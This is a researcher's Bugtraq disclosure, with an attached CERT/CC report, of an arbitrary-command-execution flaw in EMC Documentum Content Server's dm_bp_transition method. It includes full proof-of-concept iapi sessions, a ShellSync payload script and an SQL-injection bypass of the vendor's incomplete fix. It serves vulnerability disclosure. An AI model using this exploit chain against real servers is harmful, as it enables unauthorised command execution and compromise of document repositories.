Extra information for CVE-2014-2513 - EMC Documentum Content Server: arbitrary code execution

From: andrew@panfilov.tel
To: Bugtraq <bugtraq@securityfocus.com>
Cc:
Subject: Extra information for CVE-2014-2513 - EMC Documentum Content Server: arbitrary code execution
Date:

Attachments:
VRF#HUFPRMOP.txt

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

On November 2013 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to execute arbitrary commands using
dm_bp_transition docbase method (for detailed description see
VRF#HUFPRMOP.txt).

On July 2014 vendor announced ESA-2014-064 which was claiming that
vulnerability has been remediated.

On November 2014 fix was contested  (there was significant delay after
ESA-2014-064 because vendor constantly fails to provide status of reported
vulnerabilities) by providing another proof of concept, description provided
to CERT/CC (another CNA was chosen because vendor fails to communicate) was:

=================================8<================================
I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following
error:

[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning:  "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =
'0801fd08805c9dfe'"

Such behaviour means that EMC tried to remediate a security issue by
\u20ac\u0153checking\u20ac object type of supplied object:

Connected to Documentum Server running Release 6.7.2190.0198  Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
...
[DM_API_W_NO_MATCH]warning:  "There was no match in the docbase for the
  qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"

API> Bye

bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure
bin]$

So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:

~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory

~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:


       EMC Documentum iapi - Interactive API interface
       (c) Copyright EMC Corp., 1992 - 2011
       All rights reserved.
       Client Library Release 6.7.2190.0142


Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info:  "Session 0101fd088014000c started for
  user test01."


Connected to Documentum Server running Release 6.7.2190.0198  Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
...
0801fd08805c9dfe
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
         repo repo dmadmin "" 0000000000000000 0000000000000000
         0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
         from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
         0000000000000000  0000000000000000 0000000000000000 ""
         0 0 T F T T dmadmin 0000000000000000'

...

(1 row affected)

API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$

Here \u20ac\u02dcunion \u20ac\u20ac\u2122 allows to bypass check based on "id" call:

Connected to Documentum Server running Release 6.7.2190.0198  Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
          select r_object_id from dm_sysobject where
          r_object_id='0801fd08805c9dfe'
...
0801fd08805c9dfe
API> apply,c,,GET_LAST_SQL
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...

select all dm_procedure.r_object_id from dm_procedure_sp  dm_procedure where
     ((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
     (dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
     union select all dm_sysobject.r_object_id from dm_sysobject_sp
     dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
     and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)

API> close,c,q0
...
OK

Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
            dm_sysobject where r_object_id='0801fd08805c9dfe
...
[DM_API_E_BADID]error:  "Bad ID given: 0801fd08805c9dfe' union
            select r_object_id from dm_sysobject where r_object_id=
            '0801fd08805c9dfe"


API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
            dm_sysobject where r_object_id='0801fd08805c9dfe
...
OK
=================================>8================================

__
Regards,
Andrey B. Panfilov 


  Vulnerability Report Confirmation - [VRF#HUFPRMOP]

Your vulnerability report has been successfully received. You may save
or print this page for your own records. The Report Tracking ID assigned
to this report is VRF#HUFPRMOP. Details of your report are listed below.

If you have any questions or require additional information, please call
the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org
<mailto:cert@cert.org?subject=VRF%20question%20VRF#HUFPRMOP>. Please
reference this Report Tracking ID: VRF#HUFPRMOP.

Do not use the back button to submit another report. Click here
<https://forms.cert.org/VulReport/index.jsp> instead.


------------------------------------------------------------------------


    Vulnerability Report


Name    Andrey B. Panfilov
Organization     independent
Email Address   andrew@panfilov.tel
Telephone Number
Vulnerability Description  EMC Documentum Content Server: arbitrary code
execution in dm_bp_transition.ebs

Vendor was notified about vulnerability on November 2013,
though vendor claims, that vulnerability has been fixed,
it wasn't announced and the fix is incomplete.


Provided PoC:

Docbase method information:

API> retrieve,c,dm_method where object_name='dm_bp_transition'
...
1001ffd780000176
API> dump,c,l
...
USER ATTRIBUTES

object_name : dm_bp_transition
owner_name : dmadmin
owner_permit : 7
group_name : docu
group_permit : 5
world_permit : 3
method_verb : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition
method_args []: <none>
launch_direct : T
launch_async : F
trace_launch : F
run_as_server : T

Vulnerable Code (userPostprocID$ - user input parameter):

Sub BP_Transition(_
docbase_name$,_
server_config_name$,_
user_name$,_
user_ticket$,_
sysID$,_
policyID$,_
aliasID$,_
userEntryID$,_
actionID$,_
userActionID$,_
userPostprocID$,_
targetState$,_
targetStateNo$,_
resumeStateNo$,_
run_entry$,_
run_actions$,_
commitFlag$,_
attachFlag$,_
login_as$,_
orig_sessionID$)

.....

If (result = True And commitFlag = "T") Then
If (debug = True) Then
PrintToLog sess, "Commit the changes."
End If
result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo,
resumeStateNo, attachFlag)
If (result = True) Then
If (debug = True) Then
PrintToLog sess, "Run post action."
End If
result = RunProcedure(userPostprocID, 4, sess, sysID,_
user_name, targetState)
End If
Else

Exploitation:

$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:


EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027


Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."


Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)

API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability


Vendor have decided that the root cause of problem is users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have following behavior:

[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."


Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."

BUT:

API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK

API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)

....

API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
Can we provide your name to the vendor?       Yes
Do you want to be publicly acknowledged?        Yes
Vendor Contact Status   will not contact
Vendor Name        EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations    All versions of Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?       Yes
Is there a public exploit?      Yes
Vulnerability Impact
Comments
Attached File
Date    2014-04-25T12:48:51
Report Tracking ID      VRF#HUFPRMOP
CERT Tracking IDs      VU#315340


------------------------------------------------------------------------
Carnegie Mellon University <http://www.cmu.edu/>

©2014 Carnegie Mellon University <http://www.cmu.edu/






Copyright © 1995-2018 LinuxRocket.net. All rights reserved.